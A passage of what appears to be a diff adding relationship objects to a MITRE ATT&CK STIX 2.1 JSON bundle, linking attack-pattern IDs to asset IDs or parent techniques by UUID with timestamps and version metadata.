"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--85449a6b-9403-4c81-a7af-09742c847b00", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8554568f-0d92-4bc7-ae5c-261541696514", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7007935a-a8a7-4c0b-bd98-4e85be8ed197", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--85768be4-53ea-4867-bcfd-321708601d62", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--85ae686f-c0b4-4eda-88d7-1cc0e44e7f7f", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--85b04bd0-f7cd-47b4-b18d-667187f0f03b", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--85d4b12f-7891-4bed-be5d-09060016afba", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8631c069-1bf8-432c-9745-634555900ddb", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d2be8b9-d24c-4e98-83bf-2f5f79477163", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8636feeb-98f9-4e6c-bc33-e22bbf5f0c4e", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8664b5a7-048c-4b1d-86b9-b2a6a555b803", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8669a7a1-1589-4b05-ad0b-3026195b0268", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--86a8d6aa-beff-4343-a0b2-dd099202b2dc", + "created": "2023-09-28T19:58:13.866Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:58:13.866Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--86c16ccf-cd37-4c5a-822b-034448056066", + "created": "2020-01-24T14:26:51.389Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", + "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--86c5103f-e3ac-4fc1-8294-87a18683e204", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--86c68d0b-23db-4f0a-9d06-a3832ec4e8ed", + "created": "2020-10-02T15:47:59.629Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e", + "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--86e7a6d1-baa5-4a8d-9ba8-302fb0d72f9c", + "created": "2023-09-28T21:09:41.659Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:09:41.659Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--87146c3d-f6f3-4800-b74c-50e1b1cbfa9f", + "created": "2020-02-20T15:31:43.917Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--871d45c7-a3c4-441c-9caa-1607f0f5eadb", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--87290977-08e4-45af-88d4-8dbe45c305fa", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--874a268d-13ae-4434-82b0-ddc903f64dc0", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--874be04f-821e-4208-8302-b421002cfddc", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--875c2a09-53e9-46fd-882b-5cf9cd11d370", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8787d75b-9c28-437d-b6b5-93d2d7e8462e", + "created": "2020-02-11T18:23:26.146Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", + "target_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--878949b1-a148-4d75-b587-91d81c9e2722", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--879f474b-0076-49f4-b946-f6cd30a0e845", + "created": "2024-06-26T13:50:48.290Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:50:48.290Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--87d78b8c-6f92-46a2-84dd-8f4822727a1d", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--87dddbd1-9d72-4cc6-9a95-56fa68e83cb2", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--87fecbf7-2500-48f2-bf2e-000f5ecb8386", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--880b2623-cdbd-4409-9b31-f51e33e66d34", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8851f959-22db-4346-9505-9a3f534fb240", + "created": "2022-07-08T12:39:29.781Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-07-08T12:39:29.781Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--04a5a8ab-3bc8-4c83-95c9-55274a89786d", + "target_ref": "attack-pattern--0458aab9-ad42-4eac-9e22-706a95bafee2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--88714fcf-7706-437a-99ee-bb048b3714a9", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--887c02dc-f1e5-4dbf-9362-a88638f1ee34", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8881922b-0054-4ca1-8509-6f68299adb4b", + "created": "2024-06-27T09:10:05.153Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:10:05.153Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--88821221-5858-4807-8903-dca0183cd13d", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8883e247-e7d7-4b5a-90a5-7c572561b731", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--8893bfe0-32e8-4254-8b72-207efda13ede", + "created": "2024-06-27T09:06:57.583Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:06:57.583Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--889d7446-b509-4e15-829f-f5e9c8b85aa7", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--88aa51c3-b020-4283-b325-798dad4134c4", + "created": "2020-01-24T14:18:13.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b53dbcc6-147d-48bb-9df4-bcb8bb808ff6", + "target_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--88c3800e-dc56-459d-b945-effe87ffcffb", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": 